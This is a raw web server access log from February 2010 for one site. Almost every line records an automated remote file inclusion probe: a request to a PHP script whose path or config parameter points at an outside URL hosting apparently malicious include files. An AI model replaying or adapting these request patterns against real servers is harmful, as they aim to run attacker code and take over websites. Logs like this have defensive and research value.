62.67.235.148 - - [14/Feb/2010:07:28:31 -0800] "GET /logs/access_100126.log%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:28:35 -0800] "GET /styles/internal/header.php?tpl_pgb_moddir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:28:36 -0800] "GET /logs/access.log//styles/internal/header.php?tpl_pgb_moddir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:28:36 -0800] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:07:28:39 -0800] "GET /logs/access_100129.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
121.88.4.74 - - [14/Feb/2010:07:28:41 -0800] "GET /logs/access_100119.log%20%20/?sPath=http://www.hankooknano.com/bbs/text/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:07:29:03 -0800] "GET /logs/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:07:29:03 -0800] "GET /logs/access_100202.log%20%20/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:07:29:03 -0800] "GET /index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:29:16 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:07:29:19 -0800] "GET /logs/access_100111.log/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:07:29:26 -0800] "GET /logs/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:07:29:26 -0800] "GET /logs/access_100202.log%20%20/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:07:29:26 -0800] "GET /index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:29:28 -0800] "GET /logs/access.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:29:34 -0800] "GET /logs/access.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:29:36 -0800] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:29:36 -0800] "GET /logs/access.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:29:36 -0800] "GET /styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:07:29:41 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:29:46 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:29:46 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:29:46 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:29:47 -0800] "GET /logs/access.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:29:47 -0800] "GET /styles/internal/header.php?tpl_pgb_moddir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:29:47 -0800] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:29:51 -0800] "GET /logs/access.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:29:51 -0800] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:29:51 -0800] "GET /styles/internal/header.php?tpl_pgb_moddir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:07:29:52 -0800] "GET /logs//include/write.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:07:29:52 -0800] "GET /logs/access_100111.log%20%20//include/write.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:07:29:52 -0800] "GET /include/write.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:07:29:57 -0800] "GET /logs/access_100126.log%20%20//include/write.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.7.46 - - [14/Feb/2010:07:30:10 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:30:11 -0800] "GET /logs/access_100122.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:30:16 -0800] "GET /logs/access_100112.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:30:17 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:30:17 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:30:18 -0800] "GET /logs/access_100210.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:30:18 -0800] "GET /logs/access_100111.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:30:26 -0800] "GET /logs/access_100112.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:30:29 -0800] "GET /logs/access_100112.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:30:30 -0800] "GET /logs/access_100126.log%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:07:30:35 -0800] "GET /logs/access_100129.log%20%20/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:07:30:37 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:07:30:37 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:07:30:37 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:30:44 -0800] "GET /logs/access_100112.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:30:55 -0800] "GET /logs/access_100112.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:07:31:12 -0800] "GET /logs/access_100117.log%20%20/become_editor.php?theme_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:07:31:14 -0800] "GET /logs/access_100129.log%20%20/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:07:33:44 -0800] "GET /logs///vwar/backup/errors.php?error=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:07:33:44 -0800] "GET //vwar/backup/errors.php?error=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:07:33:44 -0800] "GET /logs/access_100107.log///vwar/backup/errors.php?error=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:07:33:46 -0800] "GET /logs/access_100107.log%20%20/errors.php?error=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.88.4.74 - - [14/Feb/2010:07:34:24 -0800] "GET /logs/access_100124.log%20%20/?sPath=http://www.hankooknano.com/bbs/text/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [14/Feb/2010:07:35:39 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [14/Feb/2010:07:36:13 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:07:36:37 -0800] "GET /styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:07:36:37 -0800] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:07:36:37 -0800] "GET /logs/access.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:07:37:06 -0800] "GET /logs/access_100123.log/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:07:37:06 -0800] "GET /logs/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:38:27 -0800] "GET /write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:38:33 -0800] "GET /logs/access_100203.log%20%20/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:38:33 -0800] "GET /logs/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:38:45 -0800] "GET /write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:07:38:46 -0800] "GET /logs/access_100129.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:38:47 -0800] "GET /write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:38:51 -0800] "GET /logs/access_100203.log%20%20/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:38:51 -0800] "GET /logs/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:38:52 -0800] "GET /logs/access_100203.log%20%20/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:38:52 -0800] "GET /logs/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:39:11 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:39:11 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:39:12 -0800] "GET /logs/access_100210.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:39:13 -0800] "GET /logs/access_100111.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:39:47 -0800] "GET /logs/access_100111.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:39:47 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:39:47 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:39:47 -0800] "GET /logs/access_100210.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:39:49 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:39:49 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:39:49 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:39:51 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:39:51 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:39:51 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:40:04 -0800] "GET /logs/access_100109.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:40:04 -0800] "GET /logs/access_100112.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:40:04 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:40:04 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:07:40:06 -0800] "GET /include/write.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:07:40:06 -0800] "GET /logs/access_100111.log%20%20//include/write.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:07:40:07 -0800] "GET /logs//include/write.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:40:12 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:40:22 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:40:22 -0800] "GET /logs/access_100109.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:40:22 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:40:26 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:40:33 -0800] "GET /logs/access_100114.log/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:40:33 -0800] "GET /errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:40:33 -0800] "GET /logs/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:40:33 -0800] "GET /logs/access_100119.log/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:40:37 -0800] "GET /logs/access_100112.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:41:20 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:41:20 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:41:20 -0800] "GET /logs/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:41:20 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:41:21 -0800] "GET /errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:41:21 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:41:23 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:07:41:29 -0800] "GET /logs/access_100111.log/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:41:32 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:41:32 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:41:32 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:41:59 -0800] "GET /logs/access_100203.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.96.168.169 - - [14/Feb/2010:07:42:22 -0800] "GET /logs/access_100202.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:07:42:22 -0800] "GET /logs/access_100103.log%20%20/become_editor.php?theme_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:07:42:22 -0800] "GET /become_editor.php?theme_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:07:42:22 -0800] "GET /logs/become_editor.php?theme_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
